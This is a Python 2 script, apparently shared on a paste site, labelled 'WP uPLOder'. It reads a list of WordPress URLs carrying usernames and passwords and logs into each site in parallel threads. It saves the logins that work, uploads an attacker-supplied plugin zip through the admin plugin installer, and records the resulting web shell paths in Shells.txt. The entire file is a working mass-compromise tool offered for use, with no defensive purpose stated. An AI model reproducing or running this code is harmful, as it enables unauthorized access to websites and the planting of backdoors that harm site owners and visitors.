#!/user/bin/pythonimport requestsimport sys, re, osfrom multiprocessing

1. #!/user/bin/python
2.  
3. import requests
4. import sys, re, os
5. from multiprocessing import Pool
6. from multiprocessing.dummy import Pool as ThreadPool
7. from platform import system
8.  
9. log = '''\n
10. WP uPLOder
11. '
12. \n'''
13.  
14. print log
15.  
16. def WploginShell(url):
17.  
18.  
19. Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
20.  
21. lib = requests.session()
22. try:
23.  
24.  
25. ## Words Regex
26. First = re.findall('http://(.*?)/wp-login.php',url)
27. site = 'http://'+First[0]
28. GetRegex= lib.get(site+'/wp-login.php')
29.  
30. # Regex Words of login
31. Regex = re.findall('"button button-primary button-large" value="(.*?)"',GetRegex.content)
32.  
33. # User and Pass get it from File
34. User = re.findall('@(.*?)#',url)
35. Passwd = re.findall('&(.*?)@',url)
36.  
37. # Post Data login
38. Pax = {'log':User[0],
39. 'pwd':Passwd[0],
40. 'wp-submit':Regex[0],
41. 'redirect_to': site+'/wp-admin/',
42. 'testcookie':'1'}
43.  
44. req = lib.post(site+'/wp-login.php', data=Pax, headers=Headers)
45. print req
46. print req
47. if '<li id="wp-admin-bar-logout">' in req.content:
48. save = open("logins.txt", 'a')
49. save.write('[+]Login Success '+'\n'+"[#]Target:"+site+'\n'+'[#]UserName:'+User[0]+'\n'+'[#]Password:'+Passwd[0])
50. save.close()
51. print '[+]Login Success '+'\n'+"[#]Target:"+site+'\n'+'[#]UserName:'+User[0]+'\n'+'[#]Password:'+Passwd[0]
52.  
53. # Path for get Data
54. reqs = lib.get(site+'/wp-admin/plugin-install.php?tab=upload')
55.  
56. Regex1 = re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',reqs.content)
57.  
58. Regex2 = re.findall('id="install-plugin-submit" class="button" value="(.*?)"',reqs.content)
59.  
60. # Shell Uploads
61. FileUpload = sys.argv[2]
62. b0x = {'_wpnonce':Regex1[0],
63. '_wp_http_referer':site+'/wp-admin/plugin-install.php?tab=upload',
64. 'install-plugin-submit':Regex2[0] }
65.  
66. b0x2 = {'pluginzip':(FileUpload, open(FileUpload, 'rb'), 'multipart/form-data')}
67.  
68. login = lib.post(site+'/wp-admin/update.php?action=upload-plugin',data=b0x, files=b0x2, headers=Headers )
69.  
70. uploads = lib.post(site+'/wp-admin/update.php?action=upload-plugin',files=b0x2, headers=Headers )
71.  
72. exploit = requests.get(site+'/wp-content/plugins/sigma-wp/gfaddoncommon.php')
73. if 'OK' in exploit.content:
74. print "[#]:Uploaded Done :"+site
75. open('Shells.txt', 'a').write(site+'/wp-content/plugins/sigma-wp/20171820.php'+'\n')
76. else:
77. print "[-]Fail Uploaded !!!!!!!!>"+site
78. else:
79. print '[-] Login Fail '+site
80.  
81. except:
82. pass
83.  
84.  
85. def start():
86.  
87. for i in Files.readlines():
88. try:
89. i = i.strip()
90. data=WploginShell(i)
91.  
92. except:
93. pass
94.  
95. Files = open(sys.argv[1], 'r')
96. pool = ThreadPool(10)
97. pool.map(WploginShell, Files)
98. pool.close()
99. pool.join()